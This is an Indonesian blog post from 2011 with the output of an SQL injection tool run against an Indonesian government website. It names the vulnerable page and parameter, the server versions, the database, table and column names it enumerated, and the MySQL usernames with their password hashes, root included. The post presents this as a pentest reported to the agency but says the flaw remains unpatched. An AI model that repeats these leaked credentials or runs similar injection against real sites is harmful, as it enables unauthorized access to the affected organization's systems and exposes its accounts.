Rabu, 15 Juni 2011

SQL Injection Vulnerability on KPK.GO.ID

Berikut hasil pentest pada http://www.kpk.go.id
Code:

Analyzing http://www.kpk.go.id/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=132
Host IP: 119.235.24.34
Web Server: Apache/2.2.3 (Linux/SUSE)
Powered-by: PHP/5.2.6
Keyword Found: Kantor
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 2
Finding string column
Valid String Column is 1
Target Vulnerable :D
Current DB: website2
Data Base Found: information_schema
Data Base Found: betterb
Data Base Found: dakwaan
Data Base Found: dakwaan1
Data Base Found: mysql
Data Base Found: survey
Data Base Found: test
Data Base Found: test1
Data Base Found: website
Data Base Found: website2
Count(table_name) of information_schema.tables Where table_schema=0x6D7973716C is 18

Tables found: columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,pr
oc,procs_priv,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zo
ne_transition,time_zone_transition_type,user,user_info
Count(column_name) of information_schema.columns Where table_schema=0x6D7973716C AND table_name=0x6462 is 20

Columns found: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_pr
iv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_t
ables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_pri
v,Execute_priv
Count(column_name) of information_schema.columns Where table_schema=0x6D7973716C AND table_name=0x75736572 is 37
Columns found: Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,D
rop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_
priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_ta
bles_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_vi
ew_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cip
her,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_
connections
Count(*) of mysql.db is 4
Data Found: User=4dm1n.1b4s
Data Found: User=betterb
Data Found: User=mobile
Data Found: User=webkpk2
Count(table_name) of information_schema.tables Where table_schema=0x77656273697465 is 93

Tables found: webkpk_avatar,webkpk_avatar_user_link,webkpk_banner,webkpk_bannerclient,webkpk_b
annerfinish,webkpk_block_module_link,webkpk_config,webkpk_configcategory,webkpk_
configoption,webkpk_counter,webkpk_digest_stories,webkpk_digest_topics,webkpk_ed
ito,webkpk_group_permission,webkpk_groups,webkpk_groups_users_link,webkpk_image,
webkpk_imagebody,webkpk_imagecategory,webkpk_imgset,webkpk_imgset_tplset_link,we
bkpk_imgsetimg,webkpk_marquee,webkpk_modules,webkpk_multimenu01,webkpk_multimenu
02,webkpk_multimenu03,webkpk_multimenu04,webkpk_multimenu05,webkpk_multimenu06,w
ebkpk_multimenu07,webkpk_multimenu08,webkpk_multimenu_counter,webkpk_myalbum_cat
,webkpk_myalbum_photos,webkpk_myalbum_text,webkpk_myalbum_votedata,webkpk_newblo
cks,webkpk_online,webkpk_priv_msgs,webkpk_protector_access,webkpk_protector_log,
webkpk_ranks,webkpk_session,webkpk_smartfaq_answers,webkpk_smartfaq_categories,w
ebkpk_smartfaq_faq,webkpk_smiles,webkpk_stats_date,webkpk_stats_hour,webkpk_stat
s_ip,webkpk_stats_month,webkpk_stats_refer,webkpk_stats_refer_bl

Can not get all tables by group_concat!

Count(*) of mysql.db is 4
Data Found: Db=betterb
Data Found: Db=betterb
Data Found: Db=website2
Data Found: Db=website
Count(*) of mysql.db is 4
Data Found: Db=betterb
Data Found: Db=betterb
Data Found: Db=website2
Data Found: Db=website
Count(*) of mysql.user is 8
Data Found: User=4dm1n.1b4s
Data Found: Password=*68AB655AF1DDBDB3179671D16EB5B698564AC722
Data Found: User=4dm1n.1b4s
Data Found: Password=*68AB655AF1DDBDB3179671D16EB5B698564AC722
Data Found: User=4dm1nw3b
Data Found: Password=*277CD4AB1AA59243524A7486C0A257442A2F2F71
Data Found: User=betterb
Data Found: Password=*39E5325214C84F7BDE26EE5127392D3E8DC51863
Data Found: User=mobile
Data Found: Password=*8AACD183ADE1D5415C2242B15D7C81ABD117380A
Data Found: User=root
Data Found: Password=*277CD4AB1AA59243524A7486C0A257442A2F2F71
Data Found: User=root
Data Found: Password=*277CD4AB1AA59243524A7486C0A257442A2F2F71
Data Found: User=webkpk2
Data Found: Password=*FF56F96A6609B55BD6FD5779A7106C8447BF69DC



Vulnerable Founder : TaBUn_GuCi
Pentest reported by Cyber4rt Crew to informasi@kpk.go.id on June 12, 2011, 02:46:18 PM
Sampai sekarang masih belum di patch img

Tidak ada komentar:

Poskan Komentar